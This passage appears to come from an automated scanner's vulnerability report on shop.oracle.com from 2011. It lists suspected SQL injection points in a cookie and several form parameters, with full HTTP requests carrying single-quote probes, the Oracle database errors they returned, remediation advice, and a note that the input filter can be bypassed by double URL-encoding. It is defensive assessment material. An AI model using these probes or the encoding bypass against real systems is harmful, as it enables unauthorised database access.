s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Doracleglobal%252Coraclestore%253D%252526pid%25253Dostore%2525253A%25252520oracle%25252520store%252526pidt%25253D1%252526oid%25253Dhttps%2525253A//shop.oracle.com/pls/ostore/f%2525253Fp%2525253Ddstore%2525253A6%2525253A7881107130450135%2525253A%2525253ANO%2525253ARP%2525252C6%2525253AP6_LPI%2525253A4508925239811805719%252526ot%25253DA%2526oraclecom%253D%252526pid%25253Docom%2525253Aen-us%2525253A%2525252Fproducts%2525252Fapplications%2525252Febusiness%2525252F%252526pidt%25253D1%252526oid%25253Dfunctiononclick%252528event%252529%2525257Bjavascript%2525253Aif%252528%252521isUserInput%252529%2525257Bdocument.searchForm.q.value%2525253D%252527%252527%2525253B%2525257D%2525257D%252526oidt%25253D2%252526ot%25253DTEXT%3B

Response

HTTP/1.1 200 OK
Date: Mon, 17 Oct 2011 12:18:28 GMT
Server: Oracle-Application-Server-10g
Vary: Host
Content-Length: 13340
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Product Details - </title>


...[SNIP]...
<div class="ErrorPageMessage">ORA-06502: PL/SQL: numeric or value error: character to number conversion error</div>
...[SNIP]...

1.28. https://shop.oracle.com/pls/ostore/f [s_sess cookie]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://shop.oracle.com
Path:   /pls/ostore/f

Issue detail

The s_sess cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the s_sess cookie, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be Oracle.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses. There is probably no need to perform a second URL-decode of the value of the s_sess cookie as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

GET /pls/ostore/f?p=dstore:product:0::NO:6:P6_LPI,P6_PROD_HIER_ID:4509235234901805719915,4509948309481805720010 HTTP/1.1
Host: shop.oracle.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: */*
Referer: https://shop.oracle.com/pls/ostore/f?p=dstore:product:0::NO:6:P6_LPI,P6_PROD_HIER_ID:4509235234901805719915,4509948309481805720010
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: WWV_PUBLIC_SESSION_700=7881107130450135; s_wgw_lv=1315343380912; s_nr6=1315343380933-New; s_nr=1318816660522; p_cur_URL=http://education.oracle.com/pls/web_prod-plq-dad/db_pages.getpage?page_id=233; p_org_id=1001; p_lang=US; s_sq=%5B%5BB%5D%5D; s_pers=%20gpv_p24%3Dno%2520value%7C1318853882276%3B%20gpw_e24%3Dno%2520value%7C1318853882279%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Doraclecom%253D%252526pid%25253Docom%2525253Aen-us%2525253A%2525252Fproducts%2525252Fapplications%2525252Febusiness%2525252F%252526pidt%25253D1%252526oid%25253Dfunctiononclick%252528event%252529%2525257Bjavascript%2525253Aif%252528%252521isUserInput%252529%2525257Bdocument.searchForm.q.value%2525253D%252527%252527%2525253B%2525257D%2525257D%252526oidt%25253D2%252526ot%25253DTEXT%3B%2527

Response 1

HTTP/1.1 200 OK
Date: Mon, 17 Oct 2011 11:48:28 GMT
Server: Oracle-Application-Server-10g
Vary: Host
Content-Length: 28711
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html>
<!--[if lt IE 7 ]> <html class="ie6"> <![endif]-->
<!--[if IE 7 ]> <html class="ie7 no-css3"> <![endif]-->
<!--[if IE 8 ]> <html class="ie8 no-css3"> <![endif]-->
<!--[if IE 9 ]>
...[SNIP]...
<!-- End of Product Details -->Invalid PL/SQL expression condition: ORA-01403: no data found
<!--CONDITION: ds_featured_pkg.product_exists
(
p_prod_hier_id =>
...[SNIP]...

Request 2

GET /pls/ostore/f?p=dstore:product:0::NO:6:P6_LPI,P6_PROD_HIER_ID:4509235234901805719915,4509948309481805720010 HTTP/1.1
Host: shop.oracle.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: */*
Referer: https://shop.oracle.com/pls/ostore/f?p=dstore:product:0::NO:6:P6_LPI,P6_PROD_HIER_ID:4509235234901805719915,4509948309481805720010
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: WWV_PUBLIC_SESSION_700=7881107130450135; s_wgw_lv=1315343380912; s_nr6=1315343380933-New; s_nr=1318816660522; p_cur_URL=http://education.oracle.com/pls/web_prod-plq-dad/db_pages.getpage?page_id=233; p_org_id=1001; p_lang=US; s_sq=%5B%5BB%5D%5D; s_pers=%20gpv_p24%3Dno%2520value%7C1318853882276%3B%20gpw_e24%3Dno%2520value%7C1318853882279%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Doraclecom%253D%252526pid%25253Docom%2525253Aen-us%2525253A%2525252Fproducts%2525252Fapplications%2525252Febusiness%2525252F%252526pidt%25253D1%252526oid%25253Dfunctiononclick%252528event%252529%2525257Bjavascript%2525253Aif%252528%252521isUserInput%252529%2525257Bdocument.searchForm.q.value%2525253D%252527%252527%2525253B%2525257D%2525257D%252526oidt%25253D2%252526ot%25253DTEXT%3B%2527%2527

Response 2

HTTP/1.1 200 OK
Date: Mon, 17 Oct 2011 11:48:28 GMT
Server: Oracle-Application-Server-10g
Vary: Host
Content-Length: 35169
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html>
<!--[if lt IE 7 ]> <html class="ie6"> <![endif]-->
<!--[if IE 7 ]> <html class="ie7 no-css3"> <![endif]-->
<!--[if IE 8 ]> <html class="ie8 no-css3"> <![endif]-->
<!--[if IE 9 ]>
...[SNIP]...

1.29. https://shop.oracle.com/pls/ostore/wwv_flow.accept [p_t03 parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   https://shop.oracle.com
Path:   /pls/ostore/wwv_flow.accept

Issue detail

The p_t03 parameter appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the p_t03 parameter, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be Oracle.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

POST /pls/ostore/wwv_flow.accept HTTP/1.1
Host: shop.oracle.com
Connection: keep-alive
Content-Length: 2379
Cache-Control: max-age=0
Origin: https://shop.oracle.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: https://shop.oracle.com/pls/ostore/f?p=dstore:product:0::NO:6:P6_LPI,P6_PROD_HIER_ID:4509235234901805719915,4509948309481805720010
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: WWV_PUBLIC_SESSION_700=7881107130450135; s_wgw_lv=1315343380912; s_nr6=1315343380933-New; s_nr=1318816660522; p_cur_URL=http://education.oracle.com/pls/web_prod-plq-dad/db_pages.getpage?page_id=233; p_org_id=1001; p_lang=US; s_sq=%5B%5BB%5D%5D; s_pers=%20gpv_p24%3Dhttps%253A//shop.oracle.com/pls/ostore/f%253Fp%253Ddstore%253Aproduct%253A0%253A%253ANO%253A6%253AP6_LPI%252CP6_PROD_HIER_ID%253A4509235234901805719915%252C4509948309481805720010%7C1318853885249%3B%20gpw_e24%3Dhttps%253A//shop.oracle.com/pls/ostore/f%253Fp%253Ddstore%253Aproduct%253A0%253A%253ANO%253A6%253AP6_LPI%252CP6_PROD_HIER_ID%253A4509235234901805719915%252C4509948309481805720010%7C1318853885250%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Doracleglobal%252Coraclestore%253D%252526pid%25253Dostore%2525253A%25252520product%25252520details%25252520%2525253A%25252520oracle%25252520crystal%25252520ball%252526pidt%25253D1%252526oid%25253Djavascript%2525253ASWaddToCart%25252528this%25252529%2525253B%252526ot%25253DA%2526oraclecom%253D%252526pid%25253Docom%2525253Aen-us%2525253A%2525252Fproducts%2525252Fapplications%2525252Febusiness%2525252F%252526pidt%25253D1%252526oid%25253Dfunctiononclick%252528event%252529%2525257Bjavascript%2525253Aif%252528%252521isUserInput%252529%2525257Bdocument.searchForm.q.value%2525253D%252527%252527%2525253B%2525257D%2525257D%252526oidt%25253D2%252526ot%25253DTEXT%3B

p_flow_id=700&p_flow_step_id=6&p_instance=7881107130450135&p_page_submission_id=1395912309489726&p_request=ADD_TO_CART&p_arg_names=206263118184316685&p_t01=Store+Search&f01=2275956057831485281871&f02=11.1.2.1.0&f03=1&p_arg_names=252655103147885539&p_t02=&p_arg_values=0439721E627C30CB548DADA8E65D95BA&p_arg_names=207117723716793227&p_t03=4509235234901805719915'&p_arg_values=A5E94BE6CB06C6C78288A1BC1F3830A4&p_arg_names=250319705164410242&p_t04=4509235234901805719915&p_arg_values=A5E94BE6CB06C6C78288A1BC1F3830A4&p_arg_names=207117929257794851&p_t05=4509816130
...[SNIP]...

Response

HTTP/1.1 200 OK
Date: Mon, 17 Oct 2011 11:51:32 GMT
Server: Oracle-Application-Server-10g
Vary: Host
Content-Length: 13366
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Product Details - Oracle Cryst
...[SNIP]...
<div class="ErrorPageMessage">ORA-06502: PL/SQL: numeric or value error: character to number conversion error</div>
...[SNIP]...

1.30. https://shop.oracle.com/pls/ostore/wwv_flow.accept [p_t04 parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   https://shop.oracle.com
Path:   /pls/ostore/wwv_flow.accept

Issue detail

The p_t04 parameter appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the p_t04 parameter, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be Oracle.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

POST /pls/ostore/wwv_flow.accept HTTP/1.1
Host: shop.oracle.com
Connection: keep-alive
Content-Length: 2379
Cache-Control: max-age=0
Origin: https://shop.oracle.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: https://shop.oracle.com/pls/ostore/f?p=dstore:product:0::NO:6:P6_LPI,P6_PROD_HIER_ID:4509235234901805719915,4509948309481805720010
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: WWV_PUBLIC_SESSION_700=7881107130450135; s_wgw_lv=1315343380912; s_nr6=1315343380933-New; s_nr=1318816660522; p_cur_URL=http://education.oracle.com/pls/web_prod-plq-dad/db_pages.getpage?page_id=233; p_org_id=1001; p_lang=US; s_sq=%5B%5BB%5D%5D; s_pers=%20gpv_p24%3Dhttps%253A//shop.oracle.com/pls/ostore/f%253Fp%253Ddstore%253Aproduct%253A0%253A%253ANO%253A6%253AP6_LPI%252CP6_PROD_HIER_ID%253A4509235234901805719915%252C4509948309481805720010%7C1318853885249%3B%20gpw_e24%3Dhttps%253A//shop.oracle.com/pls/ostore/f%253Fp%253Ddstore%253Aproduct%253A0%253A%253ANO%253A6%253AP6_LPI%252CP6_PROD_HIER_ID%253A4509235234901805719915%252C4509948309481805720010%7C1318853885250%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Doracleglobal%252Coraclestore%253D%252526pid%25253Dostore%2525253A%25252520product%25252520details%25252520%2525253A%25252520oracle%25252520crystal%25252520ball%252526pidt%25253D1%252526oid%25253Djavascript%2525253ASWaddToCart%25252528this%25252529%2525253B%252526ot%25253DA%2526oraclecom%253D%252526pid%25253Docom%2525253Aen-us%2525253A%2525252Fproducts%2525252Fapplications%2525252Febusiness%2525252F%252526pidt%25253D1%252526oid%25253Dfunctiononclick%252528event%252529%2525257Bjavascript%2525253Aif%252528%252521isUserInput%252529%2525257Bdocument.searchForm.q.value%2525253D%252527%252527%2525253B%2525257D%2525257D%252526oidt%25253D2%252526ot%25253DTEXT%3B

p_flow_id=700&p_flow_step_id=6&p_instance=7881107130450135&p_page_submission_id=1395912309489726&p_request=ADD_TO_CART&p_arg_names=206263118184316685&p_t01=Store+Search&f01=2275956057831485281871&f02=
...[SNIP]...
s=0439721E627C30CB548DADA8E65D95BA&p_arg_names=207117723716793227&p_t03=4509235234901805719915&p_arg_values=A5E94BE6CB06C6C78288A1BC1F3830A4&p_arg_names=250319705164410242&p_t04=4509235234901805719915'&p_arg_values=A5E94BE6CB06C6C78288A1BC1F3830A4&p_arg_names=207117929257794851&p_t05=4509816130221805719992&p_arg_values=498C20DC5AC4EBAF85B8E6B2B473B6A4&p_arg_names=207404924623578601&p_t06=1&p_arg_na
...[SNIP]...

Response

HTTP/1.1 200 OK
Date: Mon, 17 Oct 2011 11:51:43 GMT
Server: Oracle-Application-Server-10g
Vary: Host
Content-Length: 13367
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Product Details - Oracle Cryst
...[SNIP]...
<div class="ErrorPageMessage">ORA-06502: PL/SQL: numeric or value error: character to number conversion error</div>
...[SNIP]...

1.31. https://shop.oracle.com/pls/ostore/wwv_flow.accept [p_t13 parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   https://shop.oracle.com
Path:   /pls/ostore/wwv_flow.accept

Issue detail

The p_t13 parameter appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the p_t13 parameter, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be Oracle.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

POST /pls/ostore/wwv_flow.accept HTTP/1.1
Host: shop.oracle.com
Connection: keep-alive
Content-Length: 2379
Cache-Control: max-age=0
Origin: https://shop.oracle.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: https://shop.oracle.com/pls/ostore/f?p=dstore:product:0::NO:6:P6_LPI,P6_PROD_HIER_ID:4509235234901805719915,4509948309481805720010
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: WWV_PUBLIC_SESSION_700=7881107130450135; s_wgw_lv=1315343380912; s_nr6=1315343380933-New; s_nr=1318816660522; p_cur_URL=http://education.oracle.com/pls/web_prod-plq-dad/db_pages.getpage?page_id=233; p_org_id=1001; p_lang=US; s_sq=%5B%5BB%5D%5D; s_pers=%20gpv_p24%3Dhttps%253A//shop.oracle.com/pls/ostore/f%253Fp%253Ddstore%253Aproduct%253A0%253A%253ANO%253A6%253AP6_LPI%252CP6_PROD_HIER_ID%253A4509235234901805719915%252C4509948309481805720010%7C1318853885249%3B%20gpw_e24%3Dhttps%253A//shop.oracle.com/pls/ostore/f%253Fp%253Ddstore%253Aproduct%253A0%253A%253ANO%253A6%253AP6_LPI%252CP6_PROD_HIER_ID%253A4509235234901805719915%252C4509948309481805720010%7C1318853885250%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Doracleglobal%252Coraclestore%253D%252526pid%25253Dostore%2525253A%25252520product%25252520details%25252520%2525253A%25252520oracle%25252520crystal%25252520ball%252526pidt%25253D1%252526oid%25253Djavascript%2525253ASWaddToCart%25252528this%25252529%2525253B%252526ot%25253DA%2526oraclecom%253D%252526pid%25253Docom%2525253Aen-us%2525253A%2525252Fproducts%2525252Fapplications%2525252Febusiness%2525252F%252526pidt%25253D1%252526oid%25253Dfunctiononclick%252528event%252529%2525257Bjavascript%2525253Aif%252528%252521isUserInput%252529%2525257Bdocument.searchForm.q.value%2525253D%252527%252527%2525253B%2525257D%2525257D%252526oidt%25253D2%252526ot%25253DTEXT%3B

p_flow_id=700&p_flow_step_id=6&p_instance=7881107130450135&p_page_submission_id=1395912309489726&p_request=ADD_TO_CART&p_arg_names=206263118184316685&p_t01=Store+Search&f01=2275956057831485281871&f02=
...[SNIP]...
W+License&p_arg_values=6130E111F0804409DCF473ECFD337202&p_arg_names=207419606484914025&p_t12=1&p_arg_values=DC56F6004D1F7C0C2BA5A478BBDE5013&p_arg_names=207480026756751075&p_t13=4509948309481805720010'&p_arg_values=5915CD01B4537EDB4FD2C5CB71DCAEB7&p_arg_names=207483131960828293&p_t14=&p_arg_values=0439721E627C30CB548DADA8E65D95BA&p_arg_names=207483316508833283&p_t15=&p_arg_values=0439721E627C30CB54
...[SNIP]...

Response

HTTP/1.1 200 OK
Date: Mon, 17 Oct 2011 11:53:59 GMT
Server: Oracle-Application-Server-10g
Vary: Host
Content-Length: 13367
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Product Details - Oracle Cryst
...[SNIP]...
<div class="ErrorPageMessage">ORA-06502: PL/SQL: numeric or value error: character to number conversion error</div>
...[SNIP]...

1.32. https://shop.oracle.com/pls/ostore/wwv_flow.accept [p_t18 parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   https://shop.oracle.com
Path:   /pls/ostore/wwv_flow.accept

Issue detail

The p_t18 parameter appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the p_t18 parameter, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be Oracle.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

POST /pls/ostore/wwv_flow.accept HTTP/1.1
Host: shop.oracle.com
Connection: keep-alive
Content-Length: 2379
Cache-Control: max-age=0
Origin: https://shop.oracle.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: https://shop.oracle.com/pls/ostore/f?p=dstore:product:0::NO:6:P6_LPI,P6_PROD_HIER_ID:4509235234901805719915,4509948309481805720010
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: WWV_PUBLIC_SESSION_700=7881107130450135; s_wgw_lv=1315343380912; s_nr6=1315343380933-New; s_nr=1318816660522; p_cur_URL=http://education.oracle.com/pls/web_prod-plq-dad/db_pages.getpage?page_id=233; p_org_id=1001; p_lang=US; s_sq=%5B%5BB%5D%5D; s_pers=%20gpv_p24%3Dhttps%253A//shop.oracle.com/pls/ostore/f%253Fp%253Ddstore%253Aproduct%253A0%253A%253ANO%253A6%253AP6_LPI%252CP6_PROD_HIER_ID%253A4509235234901805719915%252C4509948309481805720010%7C1318853885249%3B%20gpw_e24%3Dhttps%253A//shop.oracle.com/pls/ostore/f%253Fp%253Ddstore%253Aproduct%253A0%253A%253ANO%253A6%253AP6_LPI%252CP6_PROD_HIER_ID%253A4509235234901805719915%252C4509948309481805720010%7C1318853885250%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Doracleglobal%252Coraclestore%253D%252526pid%25253Dostore%2525253A%25252520product%25252520details%25252520%2525253A%25252520oracle%25252520crystal%25252520ball%252526pidt%25253D1%252526oid%25253Djavascript%2525253ASWaddToCart%25252528this%25252529%2525253B%252526ot%25253DA%2526oraclecom%253D%252526pid%25253Docom%2525253Aen-us%2525253A%2525252Fproducts%2525252Fapplications%2525252Febusiness%2525252F%252526pidt%25253D1%252526oid%25253Dfunctiononclick%252528event%252529%2525257Bjavascript%2525253Aif%252528%252521isUserInput%252529%2525257Bdocument.searchForm.q.value%2525253D%252527%252527%2525253B%2525257D%2525257D%252526oidt%25253D2%252526ot%25253DTEXT%3B

p_flow_id=700&p_flow_step_id=6&p_instance=7881107130450135&p_page_submission_id=1395912309489726&p_request=ADD_TO_CART&p_arg_names=206263118184316685&p_t01=Store+Search&f01=2275956057831485281871&f02=
...[SNIP]...
83316508833283&p_t15=&p_arg_values=0439721E627C30CB548DADA8E65D95BA&p_arg_names=207519617010820548&p_t16=&p_arg_names=207519824975822807&p_t17=&p_arg_names=207743514465766863&p_t18=2627214932896553482'&p_arg_names=218393024595890180&p_t19=&p_arg_names=218443119998950207&p_t20=1&p_arg_names=218604801508085341&p_t21=Y&p_arg_names=218673005668381044&p_t22=See+Configurations&p_arg_names=218673227832387
...[SNIP]...

Response

HTTP/1.1 200 OK
Date: Mon, 17 Oct 2011 11:55:09 GMT
Server: Oracle-Application-Server-10g
Vary: Host
Content-Length: 13367
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Product Details - Oracle Cryst
...[SNIP]...
<div class="ErrorPageMessage">ORA-06502: PL/SQL: numeric or value error: character to number conversion error</div>
...[SNIP]...

1.33. https://shop.oracle.com/pls/ostore/wwv_flow.accept [p_t19 parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   https://shop.oracle.com
Path:   /pls/ostore/wwv_flow.accept

Issue detail

The p_t19 parameter appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the p_t19 parameter, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be Oracle.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

POST /pls/ostore/wwv_flow.accept HTTP/1.1
Host: shop.oracle.com
Connection: keep-alive
Content-Length: 2379
Cache-Control: max-age=0
Origin: https://shop.oracle.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: https://shop.oracle.com/pls/ostore/f?p=dstore:product:0::NO:6:P6_LPI,P6_PROD_HIER_ID:4509235234901805719915,4509948309481805720010
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: WWV_PUBLIC_SESSION_700=7881107130450135; s_wgw_lv=1315343380912; s_nr6=1315343380933-New; s_nr=1318816660522; p_cur_URL=http://education.oracle.com/pls/web_prod-plq-dad/db_pages.getpage?page_id=233; p_org_id=1001; p_lang=US; s_sq=%5B%5BB%5D%5D; s_pers=%20gpv_p24%3Dhttps%253A//shop.oracle.com/pls/ostore/f%253Fp%253Ddstore%253Aproduct%253A0%253A%253ANO%253A6%253AP6_LPI%252CP6_PROD_HIER_ID%253A4509235234901805719915%252C4509948309481805720010%7C1318853885249%3B%20gpw_e24%3Dhttps%253A//shop.oracle.com/pls/ostore/f%253Fp%253Ddstore%253Aproduct%253A0%253A%253ANO%253A6%253AP6_LPI%252CP6_PROD_HIER_ID%253A4509235234901805719915%252C4509948309481805720010%7C1318853885250%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Doracleglobal%252Coraclestore%253D%252526pid%25253Dostore%2525253A%25252520product%25252520details%25252520%2525253A%25252520oracle%25252520crystal%25252520ball%252526pidt%25253D1%252526oid%25253Djavascript%2525253ASWaddToCart%25252528this%25252529%2525253B%252526ot%25253DA%2526oraclecom%253D%252526pid%25253Docom%2525253Aen-us%2525253A%2525252Fproducts%2525252Fapplications%2525252Febusiness%2525252F%252526pidt%25253D1%252526oid%25253Dfunctiononclick%252528event%252529%2525257Bjavascript%2525253Aif%252528%252521isUserInput%252529%2525257Bdocument.searchForm.q.value%2525253D%252527%252527%2525253B%2525257D%2525257D%252526oidt%25253D2%252526ot%25253DTEXT%3B

p_flow_id=700&p_flow_step_id=6&p_instance=7881107130450135&p_page_submission_id=1395912309489726&p_request=ADD_TO_CART&p_arg_names=206263118184316685&p_t01=Store+Search&f01=2275956057831485281871&f02=
...[SNIP]...
9721E627C30CB548DADA8E65D95BA&p_arg_names=207519617010820548&p_t16=&p_arg_names=207519824975822807&p_t17=&p_arg_names=207743514465766863&p_t18=2627214932896553482&p_arg_names=218393024595890180&p_t19='&p_arg_names=218443119998950207&p_t20=1&p_arg_names=218604801508085341&p_t21=Y&p_arg_names=218673005668381044&p_t22=See+Configurations&p_arg_names=218673227832387359&p_t23=Hide+Configurations&p_arg_na
...[SNIP]...

Response

HTTP/1.1 200 OK
Date: Mon, 17 Oct 2011 11:55:13 GMT
Server: Oracle-Application-Server-10g
Vary: Host
Content-Length: 13365
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Product Details - Oracle Cryst
...[SNIP]...
<div class="ErrorPageMessage">ORA-06502: PL/SQL: numeric or value error: character to number conversion error</div>
...[SNIP]...

1.34. https://shop.oracle.com/pls/ostore/wwv_flow.accept [p_t31 parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   https://shop.oracle.com
Path:   /pls/ostore/wwv_flow.accept

Issue detail

The p_t31 parameter appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the p_t31 parameter, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be Oracle.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

POST /pls/ostore/wwv_flow.accept HTTP/1.1
Host: shop.oracle.com
Connection: keep-alive
Content-Length: 2379
Cache-Control: max-age=0
Origin: https://shop.oracle.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: https://shop.oracle.com/pls/ostore/f?p=dstore:product:0::NO:6:P6_LPI,P6_PROD_HIER_ID:4509235234901805719915,4509948309481805720010
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: WWV_PUBLIC_SESSION_700=7881107130450135; s_wgw_lv=1315343380912; s_nr6=1315343380933-New; s_nr=1318816660522; p_cur_URL=http://education.oracle.com/pls/web_prod-plq-dad/db_pages.getpage?page_id=233; p_org_id=1001; p_lang=US; s_sq=%5B%5BB%5D%5D; s_pers=%20gpv_p24%3Dhttps%253A//shop.oracle.com/pls/ostore/f%253Fp%253Ddstore%253Aproduct%253A0%253A%253ANO%253A6%253AP6_LPI%252CP6_PROD_HIER_ID%253A4509235234901805719915%252C4509948309481805720010%7C1318853885249%3B%20gpw_e24%3Dhttps%253A//shop.oracle.com/pls/ostore/f%253Fp%253Ddstore%253Aproduct%253A0%253A%253ANO%253A6%253AP6_LPI%252CP6_PROD_HIER_ID%253A4509235234901805719915%252C4509948309481805720010%7C1318853885250%3B; 